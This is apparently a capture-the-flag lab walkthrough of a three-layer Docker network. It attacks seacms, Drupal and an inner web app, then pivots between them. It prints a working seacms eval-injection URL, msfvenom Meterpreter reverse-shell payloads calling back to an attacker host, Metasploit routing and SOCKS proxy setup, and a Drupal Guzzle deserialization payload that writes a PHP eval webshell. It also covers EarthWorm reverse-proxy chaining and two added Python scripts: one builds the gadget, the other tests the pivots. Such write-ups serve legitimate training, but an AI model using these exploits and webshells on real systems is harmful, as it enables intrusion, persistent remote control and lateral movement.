Attack box

192.168.190.1 (Windows)

Three-layer subnet setup

In short: start two service containers on the default Docker bridge network, publish one of them to the host and leave the other unpublished. The unpublished container is only reachable from inside the bridge network, so it forms the second layer. Then create a new Docker network, run the third container on it, and also connect the second-layer container to that new network so it has two interfaces, one on each segment. The third container is the third layer and is only reachable through the second-layer container.

Targets

http://192.168.190.128:11115/  seacms (first layer, published to the host)
http://172.17.0.2              drupal (second layer, default bridge)
http://172.29.0.10             plain web app (third layer, custom network)

Exploitation

Start with seacms. A command-execution vulnerability for it was found online: the year parameter of search.php is concatenated into PHP code that gets evaluated, so closing the surrounding call and appending eval() gives code execution:

http://192.168.190.128:11115/search.php?searchtype=5&tid=0&year=23334444);eval($_POST[1]);//

That is a direct getshell; connect with Caidao (the POST parameter, and therefore the password, is 1).

Run find / -name flag to locate the first flag:

flag4{43faa418c66277e7661600d396bf604a}

Since there are more services in the internal network, generate a Metasploit payload with msfvenom and upload it through the shell:

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.190.1 lport=5555 -f elf -o shell.elf

(For a Windows target the equivalent payload is windows/meterpreter/reverse_tcp with -f exe.)

Start a handler, then run shell.elf on the target:

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set lhost 192.168.190.1
lhost => 192.168.190.1
msf5 exploit(multi/handler) > set lport 5555
lport => 5555
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.190.1:5555
[*] Sending stage (857352 bytes) to 192.168.190.128
[*] Meterpreter session 1 opened (192.168.190.1:5555 -> 192.168.190.128:34932) at 2018-05-05 11:42:18 +0800

meterpreter >

Check which subnets the first-layer host can see:

meterpreter > run get_local_subnets

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 172.17.0.0/255.255.0.0

Add a route for that segment through the session and sweep it. Note that autoroute without -n defaults to a 255.255.255.0 mask, which is why the routing table shows 172.17.0.0/24 even though the host reported a /16; pass -n 255.255.0.0 if hosts may sit outside 172.17.0.x.

meterpreter > run autoroute -s 172.17.0.0

msf5 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set rhosts 172.17.0.1-254
msf5 auxiliary(scanner/portscan/tcp) > set ports 80,3306
msf5 auxiliary(scanner/portscan/tcp) > set threads 15
msf5 auxiliary(scanner/portscan/tcp) > run

[+] 172.17.0.3: - 172.17.0.3:80 - TCP OPEN
[+] 172.17.0.4: - 172.17.0.4:3306 - TCP OPEN
[+] 172.17.0.4: - 172.17.0.4:80 - TCP OPEN
[+] 172.17.0.2: - 172.17.0.2:80 - TCP OPEN

Add a socks4a proxy directly in msf so that local tools can use the route (in Metasploit 6 this module was merged into auxiliary/server/socks_proxy with a VERSION option):

msf5 auxiliary(scanner/mysql/mysql_login) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > options

Module options (auxiliary/server/socks4a):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The address to listen on
   SRVPORT  1080             yes       The port to listen on.


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy


msf5 auxiliary(server/socks4a) > set srvport 8889
srvport => 8889
msf5 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/socks4a) >
[*] Starting the socks4a proxy server

Browsing through that proxy (127.0.0.1:8889, SOCKS4) shows Drupal on 172.17.0.2. It has a weak admin password, so log in directly.

The deserialization bug is described at https://paper.seebug.org/334/

The PoC from that article works; its output lists DOCUMENT_ROOT, and the path itself carries the flag:

DOCUMENT_ROOT /var/www/html/flag5{3be2a3b771431f2096ff984899869fa6}

Now use the same bug to write a shell. This is the Guzzle FileCookieJar gadget: when the unserialized object is destroyed, __destruct() saves the jar to its filename property, and the cookie's Domain field, which holds a PHP stub, is written out with it. The file path is the document root found above. Backslashes and quotes are escaped for the double-quoted string the payload was submitted in, and \0 stands for the NUL byte that prefixes private property names in PHP's serialization format:

O:31:\"GuzzleHttp\\Cookie\\FileCookieJar\":4:{s:41:\"\0GuzzleHttp\\Cookie\\FileCookieJar\0filename\";s:65:\"/var/www/html/flag5{3be2a3b771431f2096ff984899869fa6}/p0desta.php\";s:52:\"\0GuzzleHttp\\Cookie\\FileCookieJar\0storeSessionCookies\";b:1;s:36:\"\0GuzzleHttp\\Cookie\\CookieJar\0cookies\";a:1:{i:0;O:27:\"GuzzleHttp\\Cookie\\SetCookie\":1:{s:33:\"\0GuzzleHttp\\Cookie\\SetCookie\0data\";a:10:{s:4:\"Name\";s:3:\"aaa\";s:5:\"Value\";s:3:\"bbb\";s:6:\"Domain\";s:33:\"<?php eval(@$_POST[lemonaaa1]);?>\";s:4:\"Path\";s:1:\"/\";s:7:\"Max-Age\";N;s:7:\"Expires\";N;s:6:\"Secure\";b:0;s:7:\"Discard\";b:0;s:8:\"HttpOnly\";b:0;s:3:\"aaa\";s:3:\"bbb\";}}}s:39:\"\0GuzzleHttp\\Cookie\\CookieJar\0strictMode\";N;}

That gives a shell at /p0desta.php under the document root, password lemonaaa1.
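As an added example (not tooling from the original write-up), here is a Python builder for the gadget above. The error-prone part of hand-editing such a payload is the s:N: lengths, which must equal the byte length of every string including the NUL bytes in private property names; the builder computes them, re-checks them, and escapes the result the same way the submitted payload is escaped. The path, PHP stub and property order are the page's; the function names are mine.

```python
"""
Builder for the Guzzle FileCookieJar write-file gadget used above.
Added example, not the write-up's own tooling: every s:N: length is computed
from the real byte length, and the result is escaped for a double-quoted
string (\\ \" and \0) the way the payload on this page is.
"""
from __future__ import annotations

import re

FILE_JAR = b"GuzzleHttp\\Cookie\\FileCookieJar"
COOKIE_JAR = b"GuzzleHttp\\Cookie\\CookieJar"
SET_COOKIE = b"GuzzleHttp\\Cookie\\SetCookie"


def ps(s: bytes) -> bytes:
    """PHP serialized string: s:<byte length>:"<bytes>";"""
    return b's:%d:"%s";' % (len(s), s)


def private_prop(cls: bytes, name: bytes) -> bytes:
    """Mangled private property name: NUL + class + NUL + property (the \\0 in the text above)."""
    return b"\x00" + cls + b"\x00" + name


def set_cookie(domain: bytes, extra: dict[bytes, bytes] | None = None) -> bytes:
    """A SetCookie whose Domain field carries the PHP stub. Expires=NULL and Discard=false
    together with storeSessionCookies=true on the jar make save() keep it instead of dropping it."""
    fields = [
        (b"Name", ps(b"aaa")), (b"Value", ps(b"bbb")), (b"Domain", ps(domain)),
        (b"Path", ps(b"/")), (b"Max-Age", b"N;"), (b"Expires", b"N;"),
        (b"Secure", b"b:0;"), (b"Discard", b"b:0;"), (b"HttpOnly", b"b:0;"),
    ]
    fields += [(k, ps(v)) for k, v in (extra or {}).items()]
    data = b"a:%d:{%s}" % (len(fields), b"".join(ps(k) + v for k, v in fields))
    return b'O:%d:"%s":1:{%s%s}' % (len(SET_COOKIE), SET_COOKIE, ps(private_prop(SET_COOKIE, b"data")), data)


def file_cookie_jar_gadget(filename: bytes, php: bytes) -> bytes:
    """FileCookieJar::__destruct() -> save($filename) -> file_put_contents(json_encode(cookies)),
    so the stub held in Domain lands in $filename. Property order matches the payload above."""
    props = (
        ps(private_prop(FILE_JAR, b"filename")) + ps(filename)
        + ps(private_prop(FILE_JAR, b"storeSessionCookies")) + b"b:1;"
        + ps(private_prop(COOKIE_JAR, b"cookies")) + b"a:1:{i:0;" + set_cookie(php, {b"aaa": b"bbb"}) + b"}"
        + ps(private_prop(COOKIE_JAR, b"strictMode")) + b"N;"
    )
    return b'O:%d:"%s":4:{%s}' % (len(FILE_JAR), FILE_JAR, props)


def check_lengths(payload: bytes) -> bool:
    """Verify every s:N: string really spans N bytes; one stale length breaks the whole unserialize()."""
    pos = 0
    pat = re.compile(rb's:(\d+):"')
    while (m := pat.search(payload, pos)) is not None:
        start = m.end()
        n = int(m.group(1))
        if payload[start + n:start + n + 2] != b'";':
            return False
        pos = start + n + 2
    return True


def yaml_double_quoted(payload: bytes) -> str:
    """Escape for a double-quoted scalar: backslash, double quote, and NUL written as \\0."""
    text = payload.decode("latin-1")
    return text.replace("\\", "\\\\").replace('"', '\\"').replace("\x00", "\\0")


if __name__ == "__main__":
    p = file_cookie_jar_gadget(
        b"/var/www/html/flag5{3be2a3b771431f2096ff984899869fa6}/p0desta.php",
        b"<?php eval(@$_POST[lemonaaa1]);?>",
    )
    assert check_lengths(p)
    print(yaml_double_quoted(p))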

Since the site is only reachable inside the internal network, run Caidao through the SOCKS4 proxy with a proxifier-style tool and connect.

flag6{5f4280194663fc90eca14aaa77bfdd55} is in /home/flag.

Next, the third layer. Same procedure: drop an msf payload on the Drupal host and look at its subnets. It has an interface on both segments:

meterpreter > run get_local_subnets

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 172.17.0.0/255.255.0.0
Local subnet: 172.29.0.0/255.255.0.0

Same again: add a route for 172.29.0.0 through the new session and scan it. route print confirms one route per session, each with the default /24 mask:

msf5 auxiliary(scanner/portscan/tcp) > set ports 80,3306
ports => 80,3306
msf5 auxiliary(scanner/portscan/tcp) > set rhosts 172.29.0.1-254
rhosts => 172.29.0.1-254
msf5 auxiliary(scanner/portscan/tcp) > route print

IPv4 Active Routing Table
=========================

   Subnet      Netmask        Gateway
   ------      -------        -------
   172.17.0.0  255.255.255.0  Session 2
   172.29.0.0  255.255.255.0  Session 4

[*] There are currently no IPv6 routes defined.
msf5 auxiliary(scanner/portscan/tcp) > run

[+] 172.29.0.2: - 172.29.0.2:80 - TCP OPEN
[+] 172.29.0.10: - 172.29.0.10:80 - TCP OPEN
[+] 172.29.0.10: - 172.29.0.10:3306 - TCP OPEN

Using msf against the third layer turned out to be unstable, so EW (EarthWorm) is used from here on.

First start a listener locally (on a VPS instead if the web service were internet-facing). rcsocks listens on 8887 for the local SOCKS client and on 1024 for the reverse connection from the target:

ew_for_Win.exe -s rcsocks -l 8887 -e 1024

Then upload ew to the first-layer server and have it connect back; this turns 127.0.0.1:8887 into a SOCKS5 proxy into the 172.17 segment:

./ew_for_linux64 -s rssocks -d 192.168.190.1 -e 1024

From there the workflow is the same as with the msf proxy: run other tools through the SOCKS5 proxy with a proxifier-style tool, or with proxychains.

To reach the third layer (172.29.0.0) through the Drupal host, chain three EW instances. First on the local box / VPS:

.\ew_for_Win.exe -s lcx_listen -l 8885 -e 1026

lcx_listen accepts SOCKS clients on 8885 and relays them to whatever connects to 1026.

Then on the first layer:

./ew_for_linux64 -s lcx_slave -d 192.168.190.1 -e 1026 -f 172.17.0.2 -g 9999

lcx_slave connects out to both 192.168.190.1:1026 and 172.17.0.2:9999 and pipes the two together; the first-layer host is the only one that can reach both.

Then on the second layer (the Drupal host):

./ew_for_linux64 -s ssocksd -l 9999

ssocksd is a plain SOCKS5 server, and because the Drupal host has an interface on 172.29.0.0, a local SOCKS5 proxy on 127.0.0.1:8885 now reaches the third layer. Start ssocksd before lcx_slave in practice: lcx_slave has to connect to 172.17.0.2:9999 when it comes up, which is the order EW's own three-level example uses.
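To confirm that a pivot actually reaches the next layer before pointing Caidao or a browser at it, here is a small SOCKS client as an added example (not part of the original write-up; standard library only, so it runs from any attack box). It speaks SOCKS4/4a to the Metasploit socks4a server on 8889 and no-auth SOCKS5 to the EW proxies on 8887 and 8885, asks the proxy to CONNECT to the target, and returns the first line of the HTTP response. The proxy ports and target addresses are the ones on this page; the function names are mine.

```python
"""
Pivot checker: SOCKS4/4a and SOCKS5 CONNECT built by hand, then one HTTP request.
Added example for this write-up, not code from it; the proxy ports (8889 for the
msf socks4a server, 8885/8887 for EarthWorm) and target hosts are the page's values.
"""
from __future__ import annotations

import socket
import struct

SOCKS5_GREETING = b"\x05\x01\x00"  # VER=5, one method offered, 0x00 = no authentication


def socks4a_connect_request(host: str, port: int, userid: bytes = b"") -> bytes:
    """SOCKS4 CONNECT (VN=4, CD=1). An IPv4 literal goes in DSTIP; a hostname uses the
    SOCKS4a form, DSTIP=0.0.0.1 plus the NUL-terminated name, so the proxy resolves it."""
    try:
        dst_ip, tail = socket.inet_aton(host), b""
    except OSError:
        dst_ip, tail = b"\x00\x00\x00\x01", host.encode() + b"\x00"
    return struct.pack("!BBH4s", 4, 1, port, dst_ip) + userid + b"\x00" + tail


def socks4_reply_ok(reply: bytes) -> bool:
    """8-byte reply; VN must be 0 and CD 0x5a (granted). 0x5b..0x5d are rejections."""
    return len(reply) == 8 and reply[0] == 0 and reply[1] == 0x5A


def socks5_connect_request(host: str, port: int) -> bytes:
    """SOCKS5 CONNECT (VER=5, CMD=1, RSV=0): ATYP 1 for an IPv4 literal, ATYP 3
    (length-prefixed domain) otherwise, then the port in network byte order."""
    try:
        addr = b"\x01" + socket.inet_aton(host)
    except OSError:
        name = host.encode()
        addr = b"\x03" + bytes([len(name)]) + name
    return b"\x05\x01\x00" + addr + struct.pack("!H", port)


def socks5_reply_ok(reply: bytes) -> bool:
    """VER=5, REP=0 means success; REP 1..8 are the RFC 1928 failure codes."""
    return len(reply) >= 2 and reply[0] == 5 and reply[1] == 0


def _recv_exact(sock, n: int) -> bytes:
    """Read exactly n bytes; recv may return short reads, especially across a chain of relays."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("proxy closed the connection")
        buf += chunk
    return buf


def socks5_read_reply(sock) -> bytes:
    """Read a complete SOCKS5 reply: 4-byte header, BND.ADDR sized by ATYP, 2-byte BND.PORT."""
    head = _recv_exact(sock, 4)
    atyp = head[3]
    if atyp == 1:
        addr = _recv_exact(sock, 4)
    elif atyp == 4:
        addr = _recv_exact(sock, 16)
    elif atyp == 3:
        length = _recv_exact(sock, 1)
        addr = length + _recv_exact(sock, length[0])
    else:
        raise ValueError(f"unknown ATYP {atyp}")
    return head + addr + _recv_exact(sock, 2)


def check_pivot(proxy: tuple[str, int], version: int, target: tuple[str, int], timeout: float = 5.0) -> str:
    """CONNECT to target through proxy (version 4 or 5), send HEAD /, return the HTTP status line."""
    host, port = target
    with socket.create_connection(proxy, timeout=timeout) as s:
        if version == 4:
            s.sendall(socks4a_connect_request(host, port))
            if not socks4_reply_ok(_recv_exact(s, 8)):
                raise ConnectionError("SOCKS4 CONNECT refused")
        else:
            s.sendall(SOCKS5_GREETING)
            if _recv_exact(s, 2) != b"\x05\x00":
                raise ConnectionError("proxy did not accept no-auth SOCKS5")
            s.sendall(socks5_connect_request(host, port))
            if not socks5_reply_ok(socks5_read_reply(s)):
                raise ConnectionError("SOCKS5 CONNECT refused")
        s.sendall(b"HEAD / HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n")
        return s.recv(1024).split(b"\r\n", 1)[0].decode(errors="replace")


if __name__ == "__main__":
    # second layer through the msf socks4a server, third layer through the EW lcx chain
    print(check_pivot(("127.0.0.1", 8889), 4, ("172.17.0.2", 80)))
    print(check_pivot(("127.0.0.1", 8885), 5, ("172.29.0.10", 80)))
```

A refused CONNECT (SOCKS4 CD 0x5b, SOCKS5 REP other than 0) usually means the route or the relay is fine but the pivot host cannot reach that target, while a timeout on the very first recv points at a broken link in the lcx chain itself.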